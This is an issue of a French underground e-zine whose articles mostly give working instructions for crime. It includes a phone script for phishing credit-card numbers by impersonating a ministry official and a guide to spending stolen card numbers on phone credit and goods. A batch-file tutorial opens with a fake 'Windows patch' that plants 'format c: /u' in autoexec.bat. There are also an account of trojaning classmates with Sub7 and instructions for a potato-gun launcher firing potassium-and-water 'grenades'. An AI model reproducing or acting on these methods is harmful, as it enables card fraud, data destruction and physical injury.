* Bonjour, je suis technicien au service ministerielle des Finances (Inventez un mytho, n'importe
quoi !!) et suite a une intrusion et a la destruction de notre base de données, nous devons
vérifier systématiquement la concordance des nom et prénom avec les numéro de cartes de
Crédits afin de remettre en état notre base de données.
$ Vouiiiii
* Alors donnez nous votre nom prénom.
$ Mme Ginette Roberta
* (étouffez un rire, les bofes ont tjs un nom a couché dehors :p) Attendez deux petites
seconde...(si vous avez un Pc a portez de main tapez comme un bourrin dessus :p)
Si vous avez pris votre victime au hasard dans un annuaire, regardez l'adresse et dite :
* Donc Madame Ginette Roberta, 15 rue des Fucker ?
$ Vouiii c ça !
* Maintenant nous allons procéder a votre identification Bancaire.
$ Vouiiiii
* Donnez moi votre numéro de carte bleue ainsi que la date de validité. Si vous n'en avez pas, Au
revoir. Faites attention car si vous vous trompez dans le numéro vous ne pourrez plus rien retirez
ni acheter (En clair faut faire flipper Ginettte !!!)
$ Tout de suite (elle fouille dans son sac a main) 2566 5656 5454 4545 et la date de validité
02/00
* Bien merci beaucoup Madame, au revoir. Vous devriez recevoir un courrier dans les jours qui
viennent.
$ Au revoir
**** Fin de la Discussion !
Et voilà vous êtes heureux ?? Bon passons a la suite :
3. Acte II "Les Téléphones" ou "Y a pas d'ot titre"
La partie a mon avis, la plus délicate il s'agit de commander le téléphone miracle en l'envoyant
a une adresse précise ( pas la votre bandes de cons),vous passez la commande par minitel
méthode la plus rapide et la plus anonyme, par l' INTERNET ou par téléphone (le minitel c'est
bcp mieux....).Vous commander un telephone sans fil multicombinés avec la plus grande portee
en général 400 m (Non pas de CB :p) et deux ou trois combines supplémentaires pour vos
potes ou pour en avoir en reserve,puis envoyez tout ça a une adresse que vous aurez définie
choisissez l'envoi en 24h si vous n'êtes pas patient. Deux jours après avoir fait la commande,
rendez vous a l'adresse ou vous avez envoyez le paquet avec soit une lettre bidon de la boite de
VPC que vous aurez faites vous même mentionnant une erreur de leur part pour l'adresse de
réception soit si vous avez au moins 25-30 ans vous faire passez pour un des livreur pour
récupérer le paquet.(ou alors vous allez vous faire fouttre j'ai plus d'idée :p)
4. Acte III: "Le Concours" ou "Les gens sont vraiment con !"
Bon le but consite a refilé un des combinés a un type quelquonque qui habite pas loin (ou loin
si vous voulez maus c'est pas pratique puisqu'il faut être a moins de 400 M de lui :))
Donc par exemple vous allez l'offrir en cadeau a un concours (Radio, Télé, Mag...comme vous le
sentez !)
* Bonjour Mr Merde de Nizo
$ Bonjour...
* Savez vous qui je suis ???
$ Non mais vous allez me le dire
* Je suis Robert de Ginette !! Et vous avez été choisi pour participer a notre concours !
$ Quoi ?? (Là normallement c'est un baufe donc il pisse dans son froc :p)
* Alors première question : "Qui a gagné la coupe du monde"
$La France ?
* Ouiiiii (meme si c'est faux dite pareil :))
* Qui a gagné la première guerre mondiale ?
$ L'auTriche ?
*Bravo vous avez gagné un téléphone sans fil dernière génération !!! Nous allons passez hors
antenne pour prendre vos coordonnées...
$YEAHHH
Et voilà il est bien niké le baufe ! Vous lui envoyez dans un bo carton, avec des pubs partout et
vous mettez une lettre lui disant qu'il a gagne ensuite quand vous voulez phonez vous allez
devant chez lui ( ou vous restez chez vous si c'est a moins de 400 M) et puis voilà c'est fini :)
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
*********************************************************************
* 15 *
* La Programmation Batch *
* *
* par N0s-k *
* *
*********************************************************************
1.Intro Aux Batchs
------------------
Tout le monde connaît autoexec.bat... mais, comment on le modifie? Est-ce un langage ?
Cela en est un tout en en étant pas un... en réalité, les fichiers batch (ou traitement pat lot)
ne sont qu'une suite d'instructions qui seront exécutés dans l'ordre indiqué. Quels sont les
avantages? Facile d'utilisation, pas grand chose a apprendre de nouveau et surtout très
pratique... et il y a aussi la possibilité de transformer un .bat en .com (allez regarder
votre .com avec wordpad... c'est autre chose que votre .bat non?)
Concrètement avec le Batch vous pouvez créer un "programme" qui va modifier Autoexec.bat
pour qu'il lance un virus au démarrage... ou même en créer un !
Déjà, un exemple de Batch:
@echo off
echo.
echo Ceci est un Batch
echo On va now installer un Patch pour Windaube....
pause
echo Installation en cours veuillez patientez...
echo Pause >> C:\Autoexec.bat
echo format c: /u >> C:\autoexec.bat
Veuillez insérez une disquette
pause
format a: /u
copy C:\windows\win.ini A:\*.*
cls
echo Mise à jour Effectuée
Explication:
------------
@echo off : Mettez toujours ça, ça va eviter de mettre sur la ligne de commande ce que vous
voulez faire comme si vous le tapiez en même temps... et même si votre victime est un lame
ça pas lui plaire de voir autoexec.bat et format sur la même ligne :)
echo. : Echo est une commande qui affiche quelque chose a l'écran et s'il est suivi d'un
point, cela signifie qu'il va sauter une ligne.
echo truc : Affiche truc a l'écran
Pause : Va stopper le programme et afficher le typique message 'appuyez sur une touche
pour continuer'
echo Pause > Autoexec.bat : C'est quelque chose de très important... on peut utiliser echo
avec un redirecteur de sortie ">" qui va effacer tout le contenu de autoexec.bat et mettre
dedans "pause" (puisque c'est avant le ">") C'est très pratique par exemple vous pouvez
créer un bat qui va lister tout le système avec la commande "tree" et va mettre tout ça
dans tree.txt, par exemple...
echo Format C: /u >> C:\autoexec.bat : A la difference de ">" qui efface tout dans le
fichier 'cible', ">>" ajoute au contenu de la cible, donc si on ouvrait a cette étape
C:\autoexec.bat, on trouvera "Pause" et "Format"
copy [...] : pas besoin d'explication, c'est juste pour vous montrez que l'on peut mettre
des commandes dos dans les fichier Batch =)
cls : Efface l'écran (pour pas qu'il voit que l'on s'est foutu de sa gueule en copiant un
sel fichier et qu'en plus il ne sert à rien :)
Voilà je vous ai expliqué ce programme digne d'un lame, c'est pour ça que vous ne
l'utiliserez pas =)
2.Commandes Avancées
--------------------
Tout d'abord, la commande 'goto' et la création de bloc. Comme toujours un petit exemple:
@echo off
cls
echo On va au bloc 1
GOTO 1
:1
echo on va au bloc 2
GOTO 2
:2
echo On quitte le programme
Y a juste une chose a dire, les ':' indique le début d'un bloc.
La commande if, déclinée en plusieurs variante:
IF EXIST Fichier : Cette condition vérifie tout d'abord l'existence du fichier, et ce
n'est qu'ensuite et seulement si le fichier existe bel et bien sur le système, que la
commande est exécutée.
IF Valeur==Valeure : vérifie tout d'abord si les deux valeurs sont identiques. Si c'est le
cas, la commande s'exécute aussitôt.
IF ERRORLEVEL : Si un programme restitue un code d'erreur, celui-ci peut servir de
condition pour décider de la suite des opérations.
Un petit Exemple =)
IF EXIST FICHIER
GOTO RENAME
ECHO Le FICHIER est introuvable
GOTO FIN
:RENAME
REN FICHIER NOUVEAUNOM
ECHO Le FICHIER a été renommé
:FIN
Ce programme vérifie si le fichier existe avant de le renommer. (C'est franchement inutile
mais on s'en fout c'est un exemple :))
Ensuite, une commande importante, "CHOICE". Elle permet de faire des menus (Enfin
pas vraiment...) et utilisée avec le commande "if error level" permet de rediriger vers
une autre partie du "programme". Voici un exemple pour mieux comprendre :
@ECHO OFF
ECHO.
ECHO Menu de démarrage:
ECHO 1) Aller sous Windows
ECHO 2) Charger Turbo Pascal
ECHO 3) Quitter: retourner sous Dos
ECHO.
CHOICE /C:123 /N
IF ERRORLEVEL 3 GOTO Fin
IF ERRORLEVEL 2 GOTO PascalGo
IF ERRORLEVEL 1 GOTO WinGo
:PascalGo
bp
GOTO Fin
:WinGo
win
:Fin
Et voila vous avez un beau menu. Vous mettez ça dans autoexec.bat et c cool =)
Remarque: Il faut mettre les ERROR LEVEL par ordre Décroissant (sinon ça marche pas =))
Et maintenant, la dernière commande propre au Batch, j'ai nommé la boucle for ! (Tout le
monde la connaît, dans presque tous les langages elle y est !)
Voici la syntaxe générale:
FOR %%Variable IN (Données) DO Commande %%Variable
Variable: Un caractère quelconque à mettre en correspondance avec le contenu de "Données".
Le résultat de cette évaluation sera arribué à la variable de même nom située à la fin de
la commande. Le caractère défini doit être le même au début comme à la fin. Les majuscules
et les minuscules sont considérées comme des caractères différents et peuvent provoquer
des erreurs. Le caractère % n'est pas autorisé.
Données: Ensemble d'informations séparées par des espaces. Ces données seront utilisées
comme paramètres pour la commande qui sera exécutée sous la variable située à la fin de la
ligne. Vous pouvez utiliser des variables de substitution pour les fichiers de commandes
(%1 . . .%9), ainsi que des jokers.
Commande: Une commande quelconque. Vous pouvez spécifier une commande de MS-DOS ou le nom
d'un autre programme, mais vous ne pouvez pas imbriquer plusieurs commandes avec FOR.
Bon je sais ce n'est pas très clair, mais deux petits exemples devraient vous aider, non ?
Exemple 1:
----------
FOR %%A IN (PASCAL PIERRE JULIEN ERIC PATRICK) DO ECHO %%A
La commande FOR introduit le premier nom à la place de %%A, puis exécute la commande echo
pour la variable située en fin de commande. Le premier nom, Pascal, s'affiche sur l'écran.
La commande FOR introduit ensuite le second nom, Pierre. Comme le montre cet exemple, les
chaînes de caractères indiquées sous "Données" s'affichent successivement à l'écran.
Exemple 2:
----------
FOR %%d IN ( *.BAK *.TMP ) DO DEL %%d
Les fichiers répondant
aux critères spécifiés sous "Données" sont introduits sous la
variable %%d et serviront de paramètres à la commande DEL De cette façon, tous les
fichiers portant l'extension indiquée seront détruits.
Exemple 3:
----------
Voici une autre façon d'utiliser une boucle FOR:
FOR %%A IN (TYPE PAUSE DEL) DO %%A %1
L'instruction ci-dessus fait défiler le fichier ( =TYPE ) représenté par la variable %1 et
efface, après une PAUSE le contenu de la variable %1. Cette variante vous offre de
nombreuses possibilités dans un fichier de commandes.
Si vous exécutez la commande FOR directement au clavier, sans passer par un fichier de
commandes, ne spécifiez qu'un seul signe % :
FOR %A IN (PASCAL PIERRE JULIEN ERIC Patrick) DO ECHO %A
Conclusion:
-----------
Bon j'espère que c'est clair pour tout le monde et vous avoir donner envie de vous lancer
dans la programmation batch...En fait même si ce n'est pas un vrai langage au sens ou on
l'entend c'est de tout de même un très bonne outils...je vais mettre dans le site ou dans
le zip du zine le convertisseur BATCH > COM
N0s-k
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
*********************************************************************
* 16 *
* Les lamers, decouverte d'une nouvelle maladie ;) *
* *
* par Elgadir *
* *
*********************************************************************
Bonjour a tous, ceci est mon premier article dans un emag (sérieus;) et vous ne
pouvez pas imaginer l'émotion qui s'empare de moi dans ce moment de bonheur suprême et
inaccessible pour le commun des mortels scotches devant tf1 a cette heure la.
Excusez-moi, je m'égare mais revenons à nos lamers, euh... nos moutons :)
Je vais vous parler maintenant, des lamers, il y en a dans mon bahut qui sont très
forts :)) Et le but de ce file sera de vous montrer qu'il existe 2 niveaux a cette
lamerozite, maladie, hélas, trop répandue. Et n'oubliez pas que tous les faits relatés
ici sont véridiques :) Tout commença en janvier dernier, j'étais à cette époque un
l4M3R ;) d'ailleurs, ça me désespère, mais tout le monde y passe, certains y restent...
Donc, en janvier, j'ai réussi à avoir mon 1er PC grâce à du carding (je sais, j'ai
honte, et puis je me suis fait reprendre...), je m'intéressais un peu, au "hacking" et je
découvre Sub7 (Ouaisssssssss :))) je décide de l'utiliser sur un gars dans mon lycée (je
n'avais que son UIN), je rentre facilement sur son pc (il avait pas cache l'ip dans icq et
n'avait aucun antivirus :)), j'étais trop content a ce moment :)
La, vous vous dites : "il va nous parler des lamers, mais c'est de lui qu'il parle,
c'est vraiment un L4m3r ce mec". Bon, jusque la, ok, mais je continue.
Donc, le mec réussi m'appelle et très impressionne me demande comment j'ai fait, je
lui explique et s'empresse d'utiliser sub7 sur tous ses copains. Il faut dire, que dans sa
classe, ils formaient une bande de potes assez comiques : chacun avait sa mailing list et
ils s'envoyaient chaque jour la blague du jour de rigoler.com. Si t'étais abonne à ces
listes (je l'ai été un temps) tu recevais chaque jour une blague miteuse en 10 exemplaires
:((
Ensuite sub7 se propage plus vite que ILOVEYOU dans la classe et ils arrêtent
d'envoyer des blagues (ouff) et ils s'entretuent avec sub7, au moins, comme ça ils nous
foutent la paix... enfin, pas pour longtemps. Ils ont compris qu'il fallait cacher l'ip sous
icq... Et la ça commence à entre dur pour moi, exemple de dialogue au bahut :
he elgadir, j'ai un problème avec sub7, je trouve pas l'ip du mec que je veux hacker
he elgadir, j'ai un problème avec sub7, je trouve pas l'ip du mec que je veux hacker
he elgadir, j'ai un problème avec sub7, je trouve pas l'ip du mec que je veux hacker
.
.
.
pitié arrêtez, démerdez vous, puisque vous êtes des grands hackers
La, ils se sont calme, mais y'en a un qui était plus coriace que les autres (merde
:((). Je décide donc, de m'amuser un peu avec lui, ça a dure à peu près une semaine :
LUNDI
he elgadir, j'ai un problème avec sub7, je trouve pas l'ip du mec que je veux hacker
viens ici mon ami, je vais t'aider
merci, t'es trop sympa
alors comme ça, tu veux avoir l'ip d'un mec alors qu'il l'a cache sous icq...
ben oui
d'abord faudrait que tu me dises pourquoi tu veux le hacker, parce que, c'est très
dangereux le hacking, tu peux aller en taule
(l'air convaincu) oui c'est vrai, mais ça me fait pas peur, il faut que je rentre
sur l'ordi de lamer4
c'est vrai, sur l'ordi de lamer4????
(l'air très content) oui oui
ça ça veut dire que t'es un dieu du hacking, lamer4, c'est trop dur de rentrer
sur son ordi, j'ai essayé sans y arriver
c vrai?
oui, mais je suis sur que toi, tu y arriveras, je vois dans ton regard et
dans ta façon de parler que tu es un grand hacker
(encore plus content) putain, cool
tu veux savoir comment on t'appellerait dans le milieu du hacking?
oh oui
tu serais un lamer, le plus grand des lamer
trop cool, c'est chanmé
[fin du déjeuner]
MARDI
[l4m3r arrive au bahut]
(criant bien fort a la cantonnade)He les gars, vous savez quoi?
non, quoi?
Je suis un lamer, ça veut dire que je suis un grand hacker, c elgadir qui me l'as dit
[comme j'avais été le 1er a découvrir sub7, il me vouaient tous une admiration]
he elgadir, c vrai ça?
ben oui, lui c'est le dieu des lamers, mais vous aussi, vous en êtes, vous
en faites pas, vous êtes tous des lamers, vous êtes une grosse bande de bons lamers
(tous vachement content)trop cool
MERCREDI
Bon, alors, comment je fais pour avoir l'ip du mec??
c assez dur, mais tu peux le faire
bon, dis le moi alors
alors la c'est très simple, mais par contre tu dis ça à personne
aucun problème
tu vois, il existe un serveur pirate a qui tu envoie l'uin du mec et tu reçois
l'ip dans un .exe [a l'époque mon seul but était de niker les PCs des plus gros lamers que moi]
c vrai, tu peux me filer l'adresse du serveur
c icqhack@usa.net
(gobant tout)put1 merci, t trop sympa
de rien, de rien
Bon, maintenant, vous imaginez la suite, je suis rentrer sur son pc sans trop de
problème, et il était trop vénère quand il a vu le .txt que j'avais laisse sur son bureau.
Mais j'espère que vous comprenez bien que moi, je ne touche plus a ce genre de logiciel et
que vous m'excuser de ma période lamer. D'ailleurs, je pense que beaucoup d'entre vous sont
passés par la, mais vous n'y êtes pas rester. Notre cher ami (l4m3r), est reste à ce stade
primitif de l'évolution de l'homme et je pense qu'il y restera encore longtemps.
Explications :
Pendant quelques mois, il ne m'as plus du tout fait chier, mais début juillet, il a
de nouveau des pulsions sanguinaires et des envies de "hack da planet". Comme il m'as
beaucoup fait chier en me demandant ou on pouvait dl sub7, il recommence son harcèlement par
icq et je cède tout en sachant kil aurait pleins d'autres questions a me poser (et merde).
Je lui file un crack qui marche pas. La, je lui explique que c'est lui qu'a pas réussi à le
faire marcher, puis je lui dis qu'il doit formater son disque et qu'après ça marchera.
j'avais une vieille excuse genre : "c'est ton éditeur de registre qu'est mal configure avec
le noyau et puis la random access memory empêche l'exécution du .exe". Le con, il a tout
gobe et s'est tape une réinstallation. Le crack ne marchant toujours pas, il décide
d'essayer sub7 et j'ai encore droit a pleins de questions :
l4m3r (ICQ#xxxxxxxx) Wrote:
dans sub7 c est quoi le remote et le virus???
le truc appele "serveur" c est koi????
l4m3r (ICQ#xxxxxxxx) Wrote:
bon aller sois pas vache!!!!
repond moi???????????????????????????????????????????????????????????????????,
l4m3r (ICQ#xxxxxxxx) Wrote:
c est koi qu il faut que j envoie a la victime????
subseven.exe???
serveur.exe
editserveur.exe ????????????
elgadir Wrote:
put1, t'en as de la chance t'es un gros lamer
l4m3r (ICQ#xxxxxxxx) Wrote:
pkoi?? chance?
elgadir Wrote:
ben, moi j'aimerais bien être un aussi
bon lamer que toi, mais jen'ai pas
tes capacites malheureuseument :((
l4m3r (ICQ#xxxxxxxx) Wrote:
prend moi pour un con!!!!
l4m3r (ICQ#xxxxxxxx) Wrote:
j ai bonne nouvelle
t es aussi un lamer
elgadir Wrote:
je sais, mais la tu me fais chier alors
TA GUEULE
Ce petit dialogue m'est arrive aujourd'hui et j'espère que ça l'aura calmer, mais
bon, avec lui, faut pas avoir trop d'espoir :((
Conclusion :
A travers ce petit file, vous avez put découvrir les qualités des lamers qui hantent
mon lycée. Mais je vais finir sur ce que je pense de cette maladie (la lamerozite), je
pense qu'elle peut être décompose en deux niveaux : le 1er, c'est un etat maladif temporel
par lequel je suis passe (et peut être vous aussi) : l'utilisation des trojans. Bien sur, à
ce 1er niveau, on est sauve car, on s'en sort assez rapidement. Par contre le 2eme niveau
est beaucoup plus dangereux pour l'entourage immédiat du lamer (comme vous avez put le
constater avec moi), quoique le lamer fasse, il reste lamer, c'est inscrit dans ses gènes,
il cherchera toute sa vie a comprendre comment marche un trojan et a quoi sert serveur.exe.
Mon conseil serait de vous éloigner de ces personnes pour qu'elles ne vous contaminent pas
avec des questions connes. Si vous pouvez vous en débarrasser, ce serait même très bien, il
faut débarrasser la terre de toute cette vermine qui pullule dans nos contrées civilisées,
alors rejoignez tous la LRCL (ligue révolutionnaire contre les lamers) que je viens de créer
et nous ferons ensemble de la terre et d'irc un endroit vivable pour nous, citoyens
exemplaires et dotés d'une intelligence supérieure ;))
Elgadir
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
*********************************************************************
* *
* Le Mad. Rocket. Laucher *
* *
* par [_M_A_D_] *
* *
*********************************************************************
Pour le premier numéro de ce mag, je tenais à présenter quelque chose de très fun
histoire d'épater les lecteurs ;). Alors j'ai décidé de dévoiler au grand jour une de mes
inventions qui est d'après moi la plus chaotique, cool, non ?
Je tiens à préciser que l'utilisation de mon invention est réservée au plus fêlés
d'entre vous.
Bon finis l'intro à deux balles et passons au fun :)
Le MaD's RoCKeT LauNCHeR
------------------------
Description:
Il s'agit de l'union d'un lance-patate avec des rockets au Potassium pur .
1) Matos nécessaire
-------------------
1.a) Le lance-patate ( facile à faire et pas cher )
----------------------------------------------------
- un tube PVC de 80mm de diamètre de 80cm de long (Fig.1)
- un tube PVC de 50mm de diamètre de 1m de long (Fig.2)
- un adaptateur 80mm/50mm (Fig.3)
- un bouchon de 80mm (Fig.4) et son pas de vis (Fig4')
- des petits réducteurs pour adapter les différentes pièces
- un allume-gaz (Fig.5)
- deux fils électriques et un sucre
- du scotch large, du papier de verre
- de la colle pvc et de la colle néoprène
- un spray
____
__|(5) |
|__|____|
_____ _______________ ____ _
| | | | | | | |
___________________ ______| (3) | | (1) | |(4')| (4)
|________(2)________| |____________| |_______________| |____| |_|
1.b) La Rocket
--------------
- une à deux cuillères de Potassium pur attention !!!
* pour vous en procurer facilement si vous êtes encore en cours, il y a
sûrement du K dans le labo de chimie d'un lycée et d'un collège sinon
vous pouvez toujours sortir un mytho au prof comme quoi vous désirez
faire une petite expérience à la maison ;)
- eau
- coton
- récipient en verre d'un peu moins de 50mm de diamètre avec deux bouchons
de chaque côté avec une sépartion au milieu waterproof et hermétique
2) Elaboration
--------------
2.a) Le lance patate
--------------------
- coller avec la colle PVC, après avoir poncé, les parties en contact des
pièces 3,1 et 4' en intercalant, si besoin, des petits réducteurs.
- ouvrir l'allume-gaz et brancher les fils électriques à la place des
électrodes grâce au sucre.
- percer un petit trou dans le tube 1 pour y faire passer les fils et vérifier
que leur écartement est optimum pour avoir une bonne petite étincellounette :
faire un noeud avec les 2 fils ou placer un sucre et deux aiguilles ( plus
classe mais pas indispensable )
- mettre de la colle néoprène sur le trou par où passent les fils pour une
bonne étanchéité de l'ensemble
- attention, ne collez surtout pas le canon, sinon vous ne pourrez pas
charger votre MaD's RoCKeT LauNCHeR et vous passerez pour un pauvre gars ;)
ça devrait donner ça:
__
_| |
______________|_|__|_____ _
| | | | | |
___________________ ______| | | | | |
|___________________| |____________|_______________|___| |_|
- Une fois le tout bien sec vous n'aurez plus qu'à charger votre M.R.L. avec
la rocket ou pour juste le fun et pour pas semer mort et destruction sur votre
passage, essayer avec des petits-suisses, des patates bien sur, journaux, ...
- Emboîter les munitions dans le réducteur (Fig.3), puis prenez l'aérosol
inflammable ( éviter les bombes à chiottes trop humide, les fils électriques
n'aiment pas trop ). Vous envoyer deux petites giclettes environ, renfermez
vite le bouchon (Fig.4), visez, tirez ... ;)
2.b) La rocket
--------------
- prenez le cotton et mettez en au fond d'un des côtés
- mettez à peu près 1/4 de potassium pur du même côté
*****************************************************************
*** faites attention que vos mains soient parfaitement sèches ***
*** le potassium pur agit très violemment avec l'eau !!!! ***
*****************************************************************
- remplissez maintenant ce côté entirement de coton ( pour propager l'eau )
- fermer délicatement ce côté très doucement mais le plus serré possible
- de l'autre côté remplissez avec le plus d'eau possible
Voilà vous venez de faire une des grenades les plus stables possibles :)
PS: si vous n'arrivez pas à trouver de potassium ne pleurez pas, essayez
alors de trouver de la soude pure ça marche très bien aussi ;)
3) Conseil technique
--------------------
- Veillez que ce que vous chargez ne prenne pas tout le diamètre du canon
- Si ça marche pas, vérifiez si vous avez bien une étincelle, si oui, faites
différents essais avec plus ou moins de gaz ( chaque M.R.L. est unique
en porté, en précision, etc.. )
- Soyez deux pour charger c'est plus pratique
- Le projectile ira dans les 20 à 50 mètres donc faites des essais avec
des object ayant le même poids même matière et envergure
- Visez avec un angle de tir entre 60° et 75° pour une portée maximale
- Protégez vous derrière un MDL-Wall genre bac à fleurs, murets, etc..
//-------------------------------------------------------//
// Article écrit par [_M_a_D_] pour le magazine BSCmag. //
// [_M_a_D_] n'est en aucun responsable de vos actes. //
// [_M_a_D_] n'est pas non plus responsable si vous //
// déchiquetez votre petite soeur en lambeaux ;) //
//-------------------------------------------------------//
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
*********************************************************************
* 18 *
* Bien utiliser un no de CB *
* *
* by Elgadir *
* *
*********************************************************************
Vous avez tous lut l'article de NOs-K pour phoner
gratos, mais bon, c'est assez chaud a mettre en oeuvre
quand même (je sais que toi, t'as reussi NOs, t'es notre
maître vénéré et le meilleur, on n'y peut rien... un peu de
lèche ca fait pas de mal ;)), donc, maintenant, je vais
vous expliquer plusieurs méthode plus soft pour appeler
gratuitement votre grande tante en Inde, et, accessoirement,
mais ça sert vraiment à rien, pour aller gratuitement sur le net,
et aussi, bien sur, je vous direz tout ce qu'on peut faire
avec un No de CB.
Donc, vous avez lut l'article de NOs (celui pour phoner gratis),
si c'est pas fait, qu'attendez vous pour le faire, putain, yen
a qui comprennent jamais rien, merde ! Bon, si vous me
suivez toujours, on va pouvoir commencer.
Alors, vous commencez par chooper un No de Carte
Bleue avec la méthode à 2F30 de NOs ;) En fait, elle est
cool cette méthode, parce qu'on a aussi le nom de la personne
à qui appartient la carte, parce que, aujourd'hui, c'est pas
comme avant (pas possible :o), c'est à dire, qu'il y a encore
... euh ... longtemps, on trouvait encore des sites pour acheter
des téléphones sans fils longue distance où yavait pas besoin
de mettre le nom qui est sur la carte ...
<STOP>
moi : euh, oui, Jean-Pierre, tu me dis koi?
JP : blabla
moi : koi ta femme est morte, j'en ait rien à foutre, donne moi
plutot l'info qui vient de tomber, j'ai des lecteurs, moi!
JP : ouinnnn :(( blablabla
<STOP>
Excusez moi chers lecteurs, mais je viens d'apprendre que ma femme
est morte ... euh... non, pardon :o) Ah oui, il existe encore des sites
où on peut payer avec juste le No de la CB. L'info vient juste de tomber.
C'est formidable, mes frères, fêtons ça ...
<STOP>
moi : JP, ammene la beuh et le whisky, et plus vite que ca !!!
<STOP>
Mes frères, tout va pour le mieux dans le meilleur des Webs, Il existe.
Mais, bon, faut pas abuser, je vous filerais le site qu'à la prochaine
issue de mag ;) ==> www.alaxis.com
Excusez moi, je délire, je ne dois pas être dans mon état normal ;)
mais, revenons plutôt à ce qui nous interresse. Donc, vous avez appliqué
comme un con le truc de NOs, vous avez vot pauvre No de CB avec le nom du bof
à qui il appartient. Essayer d'en récupérer plusieurs, pachke, vaut mieux
changer de No de CB à chaque fois que vous commanderez un truc.
Maintenant, vous savez absolument pas à quoi peut bien servir le No
de CB d'un bof ;) Ben à rien, paske ya pas de fric de ssus, c'est un bof ;)=
Je vais répertoriez pour vous les diverses façon d'utiliser ce No.
I. Le fumer
Là, c plutôt cool, mais à la seule condition que vous ayez ecrit le No
sur une feuille à rouler. Et aussi bien, sur, fumez de la bonne weed, pas
du shit marrocain tout nul !
II. Le bouffer
Là, c'est si vous êtes un peu con ou que vous avez absolument que dalle dans
le frigo. Perso, j'ai pas tester, si vous le faites ==> mailez moi :)
III. Phoner gratos
Ah ah, je parle de téléphone gratuit et tout le monde se réveille, ah ah,
vous êtes tous aussi cupides les uns que les autres, mais dans quel monde
vit-on?
3.1 La technique à NOs (voir plus haut)
3.2 Vous achetez une carte de téléphone prépayée, ça coute 50 F chez Franprix.
Vous l'achetez pas avec le No de CB, mais avec vos sous sous que vous avez
gagné difficilement en gardant 2 mioches qui ... Excusez moi, je m'égare.
Now, vous avez juste à recharger la carte avec le No de CB en mettant un max
de thunes dessus, et vous phonez gratis comme un ouf now.
Par contre, utilisez plutôt cette tech d'une cabine. Si vous le faites de chez vous
pour aller sur Internet, mettez au moins 3651 devant vot no, et venez pas pleurez
quand vous serez en tôle.
3.3 Alors, cette tech, c'est moi qui l'ai inventé même si j'ai jamais testé,
mais normalement ça doit marcher. Alors, le but du jeu, c'est de commander une
cabine téléphonique (comme celles ki ya dans la rue), vous vous demerdez pour
l'installer chez un pov con, et vous venez chez lui pour beige-boxer la cabine ;)=
Si vous le faites ==> mail plzz
3.4 Vous achetez un portable à carte, Entrée libre ou Nomad, mais surtout pas
Mobicarte (fuck FT!!). Vous faites en sorte que le môssieur qui vous vend le
portable vous demande pas vot nom, si il le fait, donnez une vieille excuse,
genre, vous avez pas vos papiers... Normalement ça passe. Ou sinon, allez chez
Darty, les vendeurs y sont trop cons, ils demandent pas vot nom (testé et approuvé
par Elgadir ;) Là, vous avez ptet dépensé 500 balles, mais vous pairez plus
jamais vos communications parce que vous allez recharger avec le No de CB.
A priori, vous riquez une seule chose : qu'on vous coupe la ligne, mais bon,
je n'ai jamais vu Bouygues le faire (SFR, je sais pas...). Ils vont pas
s'amuser a rechercher un pov gars qui arnaque un aut pov gars (le bof!) de
euh... ah peine 5000 F par mois...
3.5 Vous prenez un forfait Internet, Onetel ça marche plus, prenez autre chose.
Et puis, vous donnez le No de CB, mais c'est très déconseillé parce que le provider
reconnait le no d'appel...
IV. Aller sur les sites de cul. Cette technique est très conseillée, et si vous
passer par une connection pirate au net, vous risquez que dalle! De plus cette
utilisation a été testé par NOs;) vous pouvez lui faire confiance alors...
V. Commander tout plein de matos sur le net. Ca marche QUE si vous avez
une fausse boite aux lettre quelque part, une vrai, pas un vieux compte mail
chez yahoo ;) Bon, la c'est simple, vous commandez ce que vous voulez, le colis
arrive par la poste (avec www.alaxis.com) et vous le récuperez dans la boite
aux lettres. Et démerdez vous pour ne pas avoir à aller à la poste et devoir
montrer une ID card, sinon, zetes dans la merde...
Voilà, j'espère avoir fait le tour du sujet, s'il manque un truc, vous avez
mon mail et ma VMB. Aussi, excusez moi, je délirais un peu trop, je serais plus
sérieux dans mon prochain article sur... euh... dans mon prochain article ;)
Elgadir
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
*********************************************************************
* *
* Le Mot de la fin... *
* *
*********************************************************************
Voilà c'était l'issue #1 de notre zine sur certaines techniques qui aideront
(en tout cas nous l'esperons) les newbies qui comme nous essaye
de percer , non pas pour devenir une elite mais pour se satisfaire, pour le plaisir
d'apprendre ce que l'on aime. Si cela pouvait aider a redonner du mouvement a la
scene francaise de l'underground et bien on en saurait d'autant plus heureux.
Envoyez-nous vos commentaires, vos soutiens et meme vos critique.
Merci d'avoir lu ce mag et nous esperons que vous y ayez au moins appris quelquechose.
si ce n'est pas dans les articles, que vous preniez au moins conscience de ce a quoi
Internet risque de devenir si nous ne faisons pas tous des efforts.
Bonne continuation ...
Toute l'equipe de la BrainStormCrew.